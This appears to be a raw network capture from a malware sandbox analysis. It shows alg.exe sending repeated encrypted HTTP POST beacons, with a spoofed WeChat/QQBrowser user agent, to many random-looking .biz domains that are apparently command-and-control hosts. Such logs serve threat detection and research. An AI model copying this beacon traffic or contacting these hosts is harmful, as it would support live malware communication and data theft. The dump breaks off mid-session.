                                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                        37192.168.2.105001618.208.156.248807888C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:23.537419081 CET353OUTPOST /eaufcaidikag HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: deoci.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:23.537493944 CET778OUTData Raw: 64 78 00 0c 31 59 ca a5 fe 02 00 00 94 83 c2 cd 48 af 87 df 71 09 55 af 7f 48 fc 59 c5 26 d1 96 d5 a8 65 af 9f d5 67 20 16 65 5a 73 99 ac 5e 51 93 d5 05 dc e5 e4 4a ef 88 a7 ba 73 a9 0c 3d 35 bb c5 5b 45 b7 24 03 78 07 c8 03 cb 0a ea d7 63 50 4c
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: dx1YHqUHY&eg eZs^QJs=5[E$xcPLyAW]"O{>\0m 88p.ei'3l(bCTR0sU(6]i8Kg~8d=E>4P>R1Ugk39VZ{.;1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:24.188848972 CET413INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 18 Nov 2024 08:58:24 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=a3440eadbf4eec4b6ec743161929e5c9|155.94.241.187|1731920304|1731920304|0|1|0; path=/; domain=.deoci.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                        38192.168.2.1050017208.100.26.245807888C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:24.360749006 CET347OUTPOST /xev HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: gytujflc.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:24.360749960 CET778OUTData Raw: 0b 7a 48 bd 2b 2d 3a 0c fe 02 00 00 3a 70 a7 1c 7b 1d 00 7e e7 37 55 c7 df cf 5f 27 c7 5d 00 20 c7 44 b4 e4 b8 c9 c9 9d 60 db bb e6 0c 68 70 d2 37 5e 1d 2d e9 0b af 41 32 b9 3d 7b 87 6b 0a 7c 61 50 c4 31 43 20 98 5b c1 3f 15 d4 b7 1e 42 c3 4a 3d
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: zH+-::p{~7U_'] D`hp7^-A2={k|aP1C [?BJ=Em<7?^@D4HP60$RFtA\{RE}0oe~tfgxmV'R.V?1?rZ 3|Ov0M-E2f1A=C&Ef1s
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:25.347691059 CET744INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 18 Nov 2024 08:58:25 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 580
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 [TRUNCATED]
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:25.561934948 CET360OUTPOST /bhaolncilxcwwbrc HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: gytujflc.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:25.561934948 CET778OUTData Raw: af fe 4c 63 0c 77 71 7f fe 02 00 00 3f a8 d9 9c f6 10 d5 d6 fa e8 fd b3 72 6e 5c 4d 61 dc d6 08 89 01 22 1e 98 94 f1 37 a9 32 a7 ee 17 68 2b 98 68 b6 f4 81 66 87 58 89 1f 05 82 c8 ff 67 bd c9 bc 88 7c 46 d7 22 4c 70 92 1f cc 4f d9 e6 13 41 07 18
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: Lcwq?rn\Ma"72h+hfXg|F"LpOA&3fnx8rGTRnyf!6.4Z-'}V$8-XZCj\c`6c &9=0EfY3aCY#x+ZzyO"Q!y
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:25.706814051 CET744INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 18 Nov 2024 08:58:25 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 580
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 [TRUNCATED]
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                        39192.168.2.105001813.251.16.150807888C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:25.962547064 CET358OUTPOST /xgntpyqjfcaulras HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: qaynky.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:25.962547064 CET778OUTData Raw: 40 53 f9 15 88 0d 53 ae fe 02 00 00 45 e9 7d 70 b7 5f 2b 56 c8 ea 4e a5 6e eb 49 36 cf 71 b8 79 be 65 4f f7 47 c4 9c cd 1e 9e 24 54 71 e4 91 bf e9 82 ac cd e5 90 7e d1 83 26 6d 6e ce 5d ff 96 3d f0 eb b8 df db 91 d7 b5 75 1c 74 fa 5e 01 ea 57 fa
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: @SSE}p_+VNnI6qyeOG$Tq~&mn]=ut^WIfEw<d$jk_LpRpz&}:,{NMjCw`2qO}EYEVNzG9/m@2@+4t\l_)"%a/Bm`21\F
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:27.383431911 CET414INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 18 Nov 2024 08:58:27 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=0ebc6219182dfa388616cd5d0e2fe091|155.94.241.187|1731920307|1731920307|0|1|0; path=/; domain=.qaynky.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                        40192.168.2.105001944.221.84.105807888C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:27.559196949 CET351OUTPOST /phrsxg HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: bumxkqgxu.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:27.559218884 CET778OUTData Raw: c6 bd 15 c5 3e 2a 91 4d fe 02 00 00 a6 69 01 ae d0 74 84 17 2c bd af c2 c4 30 85 01 bf 1c 90 ba 0b 9d f3 7b 85 fe 8c 72 fc 9a 98 91 a0 77 51 4a 20 bc 14 9e 60 0e c3 fa c0 1f 1a 4e ba 9c db 6b c6 dc 79 34 11 a0 d8 d7 a9 3b a2 ed 86 ef 62 ad 87 14
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: >*Mit,0{rwQJ `Nky4;bFUcPl`=x@p9x6;A}C{\/T(}jvdY+-3&bDWTN*eb<u*Qa/<ny|6qbpsyd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:28.225547075 CET417INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 18 Nov 2024 08:58:28 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=a4ec6556468993bfc29e1a852e0301a6|155.94.241.187|1731920308|1731920308|0|1|0; path=/; domain=.bumxkqgxu.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                        41192.168.2.105002054.244.188.177807888C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:28.376916885 CET353OUTPOST /ywvbvutri HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: dwrqljrr.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:28.376940966 CET778OUTData Raw: 6d be 5d 76 38 fd 00 b4 fe 02 00 00 c5 df 80 bb 9e 58 f9 15 f8 bf 15 37 3c bc 93 fd 30 d7 41 bf af e3 78 19 32 a0 62 14 8b 06 13 ed 3e 72 aa f7 08 13 ba d5 d7 bb b0 31 3d 56 01 b5 51 2d 18 ae 22 e2 c0 d9 24 ea 62 60 2f 03 d1 05 43 78 68 9a f8 1d
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: m]v8X7<0Ax2b>r1=VQ-"$b`/Cxhwxg=3-c\O~t%iWC\XxM/;FLG. n0>b-N;vATq[;f,~B0?y6Om1qcc9qiaMpd>OoI~L.Iy*
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:29.218960047 CET416INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 18 Nov 2024 08:58:29 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=8c9f4ca0ca2b171e5a5084c4c09e6c06|155.94.241.187|1731920309|1731920309|0|1|0; path=/; domain=.dwrqljrr.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                        42192.168.2.105002135.164.78.200807888C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:29.617110014 CET348OUTPOST /uahjpn HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: nqwjmb.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:29.617110014 CET778OUTData Raw: aa 9a 21 fb ca 34 a5 b9 fe 02 00 00 bd 8a 8a c5 db f8 8e 35 01 a3 3b dc 6d c1 d3 ab cf fc 15 d9 0c 68 82 26 a7 71 e6 9c 14 e3 bf 1c 62 c8 46 21 9e c5 dd a3 db 80 37 75 e9 f2 a4 9c f6 72 ff 88 78 f1 a0 17 34 17 cf 0a 3c 83 8a b4 1a 4e d9 7a cf 46
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: !45;mh&qbF!7urx4<NzFZ|v_EBJ(D$P"qX97@w@+S"MO=9"kyH\)zY"rETFVlXfW3%z/,!wmI6A
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:30.446959019 CET414INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 18 Nov 2024 08:58:30 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=107b8616897602fe17bff3ed36d12fe6|155.94.241.187|1731920310|1731920310|0|1|0; path=/; domain=.nqwjmb.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                        43192.168.2.10500223.94.10.34807888C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:30.630033970 CET361OUTPOST /ylgyimlxuhkehpvh HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: ytctnunms.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:30.630162954 CET778OUTData Raw: e8 c1 24 22 e7 cd 27 e3 fe 02 00 00 48 39 86 07 b5 fc 27 fa 38 8f aa 8f d2 bb 71 12 c2 fe 8d ab e5 e8 bc f8 2b fd 61 38 7e 07 96 4e 50 88 a9 2d a1 67 68 cf 41 ad a6 19 bc 0f 43 74 ae 98 c5 56 ac 1a 7a f0 97 1e 90 ad 5b de 2f 14 8d 6b 8a 97 92 43
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: $"'H9'8q+a8~NP-ghACtVz[/kC|s@I;-S*wSU; uO6[T$+Y+)4qw4288QRvU&vH//8\,?w`)Le[i|xBN=+zo%)z11C-K}
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:31.303308010 CET417INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 18 Nov 2024 08:58:31 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=2e85e6e6a3981529a6768c725fd580e9|155.94.241.187|1731920311|1731920311|0|1|0; path=/; domain=.ytctnunms.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                                                                                        44192.168.2.105002382.112.184.19780
                                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:30.657711983 CET354OUTPOST /tipadjqthieq HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: lpuegx.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 834
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:30.657756090 CET834OUTData Raw: 0b 2c 4b da 18 8f c3 cb 36 03 00 00 3c 3f 08 07 9a fd 7b dc 8a 6c 2a d6 4b 30 cd ee a5 a4 32 26 a4 7e 76 e8 29 53 8b 74 a9 da 6c bd 6f bd a2 a8 6b e0 d7 2e db 5a df fb 02 94 ba 3d 5d af a7 6f 91 67 88 77 67 d9 c6 9f 62 ab 09 50 c7 33 e4 63 9a a2
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: ,K6<?{l*K02&~v)Stlok.Z=]ogwgbP3ch /9D,Har:3ATp`CG!M@7A?5)/?{TY@%1'xP}tHnpR#5C~Ic}ac8C.qJit7(MLj


                                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                        45192.168.2.1050024165.160.15.20807888C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:31.512111902 CET352OUTPOST /cxebwuvsfeq HTTP/1.1
